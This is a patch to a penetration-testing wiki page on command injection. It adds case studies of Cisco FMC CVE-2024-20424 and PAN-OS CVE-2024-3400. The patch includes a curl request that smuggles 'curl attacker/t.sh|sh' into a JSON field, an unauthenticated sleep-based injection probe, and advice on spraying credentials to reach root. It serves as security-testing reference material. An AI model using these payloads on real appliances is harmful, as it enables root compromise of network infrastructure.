From ba322c1db6be6132e3d591209296fc058581cf4e Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Thu, 27 Nov 2025 08:39:30 +0000
Subject: [PATCH] Add content from: Research Update: Enhanced
 src/pentesting-web/command-injecti...

---
 src/pentesting-web/command-injection.md | 40 ++++++++++++++++++++++++-
 1 file changed, 39 insertions(+), 1 deletion(-)

diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index 7f6dc29b9e2..91f29f7078b 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -189,6 +189,43 @@ topicurl=<handler>&param=-n
 topicurl=setEasyMeshAgentCfg&agentName=;id;
 ```
 
+### Recent exploitation case studies (2024-2025)
+
+#### CVE-2024-20424 – Cisco Secure FMC
+
+Cisco’s October 2024 advisory describes how insufficient validation in the FMC web UI lets any authenticated Security Analyst send crafted HTTP requests that run as root on the appliance and can even relay commands to managed Firepower Threat Defense devices.
+
+- Capture the `X-auth-access-token` issued after login, fuzz every JSON field exposed by the `/api/*` endpoints you can reach, and look for time-based delays or OOB hits when injecting shell metacharacters (`;`, `&&`, ``$()``).
+- Because the issue only requires the read-only Security Analyst role, low-priv credential theft (password spraying, API key reuse, IDOR) is enough to reach a root shell.
+- Successful exploitation lets you push the same malicious command set to downstream FTD sensors, so compromise of the manager often implies compromise of the fleet unless job queues are purged.
+
+Example test once you control a session token and suspect a vulnerable endpoint:
+
+```
+curl -sk -X POST https://<fmc-host>/<vulnerable-endpoint> \
+  -H "X-auth-access-token: $TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"name":"backup;curl attacker/t.sh|sh","type":"SystemTask"}'
+```
+
+Swap `<vulnerable-endpoint>` for any job/diagnostic path that reflects your user input in CLI wrappers and watch for delayed responses, DNS callbacks, or files written under `/var/sf/`.
+
+#### CVE-2024-3400 – PAN-OS GlobalProtect Gateway
+
+Alert Logic tracked CVE-2024-3400 as a zero-day in April 2024 that let unauthenticated attackers gain root on GlobalProtect gateways running PAN-OS 10.2.x < 10.2.9-h1, 11.0.x < 11.0.4-h1, or 11.1.x < 11.1.2-h3 before Palo Alto shipped hotfixes.
+
+- Target appliances that expose both GlobalProtect gateway and device telemetry; whenever telemetry is enabled, arbitrary files dropped under `/opt/panlogs/tmp/device_telemetry/` will be processed with root privileges.
+- Because exploitation is unauthenticated and network-facing, add these endpoints to unauthenticated fuzzing corpora and look for parameters that are piped into shell commands (e.g., HIP report fields, telemetry IDs) by chaining `;sleep 5` or DNS callbacks.
+
+Minimal unauthenticated probe to confirm command execution via time-based payloads:
+
+```
+curl -sk -X POST https://<pan-fw>/<globalprotect-endpoint> \
+  --data-urlencode "telemetry_token=$(printf 'blind;sleep 6;#')"
+```
+
+Monitor response times plus outbound DNS/HTTP to confirm the payload fired without needing response data. Treat success as evidence that the management-plane user `root` executed the payload and immediately collect device telemetry bundles for further persistence hunting.
+
 ## Brute-Force Detection List
 
 
@@ -199,12 +236,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
+- [Cisco Secure Firewall Management Center – CVE-2024-20424 Advisory](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-fmc-cmd-inj-v3AWDqN7.html)
+- [Alert Logic – PAN-OS GlobalProtect CVE-2024-3400](https://support.alertlogic.com/hc/en-us/articles/360051675174-CVE-2024-3400-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability)
 
 {{#include ../banners/hacktricks-training.md}}